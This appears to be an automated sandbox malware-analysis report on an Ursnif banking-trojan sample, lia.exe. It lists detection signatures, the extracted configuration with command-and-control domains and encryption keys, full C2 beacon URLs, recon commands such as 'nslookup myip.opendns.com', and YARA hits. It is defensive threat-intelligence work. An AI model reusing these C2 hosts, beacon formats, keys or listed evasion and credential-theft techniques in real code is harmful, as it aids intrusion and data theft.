Windows Analysis Report lia.exe

Overview

General Information

Sample Name: lia.exe
Analysis ID: 551720
MD5: 8b893e03dd1c7ce96df57f92f302dcb1
SHA1: a7a131ea9f39ebaa195296ebd9b44708bee8264d
SHA256: dd023f1f2ce682e9db588aa6cb859b6279d5e43f87a9a99da3cd683711736324
Tags: exegozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://apr.intooltak.com/GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc Avira URL Cloud: Label: malware
Source: http://apr.intooltak.com/Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I Avira URL Cloud: Label: malware
Found malware configuration
Source: lia.exe Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "qIukMm1AgKEd3dDbi+35d6MWl+UVbpPFMmGiIDJDDgacZEK8jS4/5zs7ubFZ5RKJ14yC3bMOc4/MB7Zet4BsfAXbGBTmAWZXgT7koTnek2QEZiZ20WKgDLTyQy6GTUUxk0Lxr770IDyy/BSk6aJtHlPex8y6K+Zfruo7cnUzrkN8zs1jBevHKQWt6llI/Itko98RJ0R0pmGGdCg3N/wJUyo7XGnNMik7BdDxE//CSyU7CGkS06hh8BE+0pne+Py1DXhCspMJHsvHS9ciS0vyjWH7bqpi3HvZcztPPJEdLRwiwxTsC/ZMMvLH6gW4XsTGYqrbBj5INNDf6kLJCXP5iGV+GsvodMKbUJybGxVS5nY=", "c2_domain": ["apr.intooltak.com", "app.querosityproject.com"], "botnet": "1000", "server": "770", "serpent_key": "BwM3bYGWLcupJ1hC", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
Multi AV Scanner detection for submitted file
Source: lia.exe Virustotal: Detection: 64% Perma Link
Source: lia.exe ReversingLabs: Detection: 74%
Antivirus / Scanner detection for submitted sample
Source: lia.exe Avira: detected
Machine Learning detection for sample
Source: lia.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.lia.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.lia.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_00B17479 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_00B17479

Compliance:

Uses 32bit PE files
Source: lia.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Binary string: ntdll.pdb source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: lia.exe, 00000001.00000003.467580599.0000000003FD0000.00000004.00000001.sdmp, lia.exe, 00000001.00000003.476010492.0000000004080000.00000004.00000001.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\vjag4cgm\vjag4cgm.pdb source: powershell.exe, 0000000C.00000002.614202751.000001770375D000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039E8409 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_039E8409
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039F2ECF lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_039F2ECF
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039EB9D4 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_039EB9D4
Source: C:\Users\user\Desktop\lia.exe Code function: 1_2_039DE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_039DE91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036BE91D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 44_2_036BE91D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036CB9D4 FindFirstFileW,FindNextFileW,FindClose,FreeLibrary, 44_2_036CB9D4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_036D2ECF memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose, 44_2_036D2ECF

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49768 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49769 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49772 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.6:49856 -> 185.189.12.123:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.6:49856 -> 185.189.12.123:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: io.immontyr.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Source: C:\Windows\System32\nslookup.exe DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: global traffic HTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 0000000C.00000003.487223074.000001777B372000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lia.exe, 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, lia.exe, 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, control.exe, 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, control.exe, 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, RuntimeBroker.exe, 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, rundll32.exe, 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, rundll32.exe, 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cmg
Source: RuntimeBroker.exe, 00000024.00000000.646611308.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000000.640875503.0000021910AF6000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000024.00000002.884581064.0000021910AF6000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobp/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.572331191.0000017700001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp String found in binary or memory: http://twitter.com/spotifyg
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000016.00000000.543937069.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.495631696.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.527688751.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000016.00000000.521348094.000000000095C000.00000004.00000020.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.573337997.0000017700210000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.621215715.0000017710062000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /Wg8ZotKLB67wfW5SwZqGSw/B6Pr8y6FSG7qE/dhgVBQ5f/qYV4zjBmW0p8TlaGQybQbuc/zPwZtYg0qe/YvqcBHXsIQLHqbH94/d_2BupZQQiTi/5Byc1fDGrMO/bSgpr9iTEwo25G/CeL9CYyO93o0dqulKxymb/hEpJXCOVCSN3Pmxe/q0xcJ_2FmJa4D27/U1246rlDM2agQvjv3h/WRbjABFUG/gI4Eitywfd5lZ23J3vVr/JPI_2B23mvnMwPmRO6K/YashCAds7tANuDYeB6xIHB/drGSloPvvfGJt/OBQ_2BHz/QyFEKNyGLRcMCqk/I HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /GUlBnqEqcwtrn48_2/BE1EqzAvLejt/cb_2BaCRrwf/fWZBg8h5a62TXa/ZijwGrOQXflAgqbaDl7vf/RWmm1wdfmEqQ53O8/wCfIuBFFTvny4Ty/wNnD_2FEBKrFWj66al/3Xji0up_2/BgYV45jLknd5oCK8kb3h/IMSPqceHWV7drpxnmfQ/DvisvgmR_2F11ZikfA2avm/yQQyOWRIC9HrG/_2Fskrj5/9o_2BraWvUUtS0KRGaPskJs/8YiMjMPZvb/QZXl3C1FFIFMxJSHp/vq0A22YW_2B0/ynWnVX3jCla/hCIZQggWpcdryd/2P_2FL1_2BMBiXUGiQteI/jG_2BPlE/MfOjEqY7X/Fc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /h_2BwNYezNkzTOCsdNbfn/ryja45eec93vXnRl/PLAH_2FQyM6jDyy/KJNIgaRFr9YvYl3hMq/ZhUn0_2BE/c6mccVrcWOAEGEovJjKg/7hXIYQcexZwU5itqfu4/vIseK0jkOuaXTGkc9nGx8s/NOa1JoKkXMAzc/6TzPbRle/G6gck37gRv7BYdFnxt_2F8j/9egvDbXEUD/ENj4iL_2FV2ZRlnx_/2FW6jH0jr8uj/hM6FvZP7xEB/_2FC54ka1xMZn_/2BjzmgrQuKHtOl7aIEkp_/2Fz7UYVuMXPvSkQj/otv3Y28C6cQXgp2/IlTPgKIH6YdiOogryV/u3aMiVshcBzajZXX8/BR9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:95.0) Gecko/20100101 Firefox/95.0Host: apr.intooltak.com
Source: global traffic HTTP traffic detected: GET /6AgScewXArsM_2BFmRh/2pb60JsM3cYOiJQfoEqhxS/XBqVgQIYsRpEr/yoCXCgLf/y1qkoNRLcIv9gBJJquez8p4/tRkVMZ4drM/Xr6yguBScPI_2FHzu/H_2FvyhGemOv/8CbTsxfBhQ6/Wgqn5njZwuecNO/0ZUAF5iUC9u0FGPgne2Pd/hUjjD7f7srSH7qRy/yQbW_2BNcbmjwvz/43Z7l034Kd9pUEZYyD/lqXle_2Bn/M1jhi1NkfKtxF86Ts8rH/3AjxB9h8PcXSos9dSO_/2FUaQoaL5TEUFHzDcyiMsr/DzmpP5HI0X7E9/2_2BXGsb/Z46ybggq4jBb9mfE_2FUIJ0/VTd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: io.immontyr.com
Source: RuntimeBroker.exe, 00000024.00000000.640770268.0000021910A80000.00000004.00000001.sdmp String found in binary or memory: n Facebook: http://www.facebook.com/spotify equals www.facebook.com (Facebook)
Source: unknown HTTP traffic detected: POST /XXR4zdt7gL/c8rfa6di0aLY9fgZ7/eabelAedxPIp/icfexNsFKv6/MZ0OW72uAREGVI/IG_2FDcTxT0eyAWdMCKCF/JStGuje_2FFLrmQY/RzT3oqYbsvN_2B0/zPieMjusYDKgzk_2Fo/3zXAxuK0i/prSNBjQgYx6raC2a8Jwa/8N8dGY9X9RfbbN1Bv3p/owXAwWB7tQ6BLsyGDmeL4f/TkwXiqJh28A6z/I03OEFID/PW89wtlpyKFCUi1HmrshXBp/rGtQtZl4aR/9TSRaifJSVZfaHvcM/VXTHUZsAPl3x/FQELGTYQh89/NyrmkOg6psA2Qr/kXGGS9vg5NJjazC_2/B HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Content-Length: 2Host: io.immontyr.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.461398948.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735246636.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461598974.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.887863520.0000021DB7F02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735331530.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.736669788.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735275248.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461428339.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402373531.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402396026.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402348722.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402294438.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735063970.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.885623791.000002DACE802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402422908.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482209524.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461632840.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.576309112.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.574589889.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572835965.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402435422.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.758280009.0000026E98402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482360612.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.409196804.0000000002E5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461516298.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461458539.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735014776.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735217272.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482275696.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.734959693.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461491629.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.565242259.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402320891.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735178288.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.404803745.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.735119734.0000000003C28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.402410864.0000000003058000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461577321.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.482336864.000001D87239C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.461546582.0000000003FB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572684942.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572753584.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.890361063.0000021913402000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.572871449.00000215F4E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: lia.exe PID: 7036, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 6004, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5360, type: MEMORYSTR
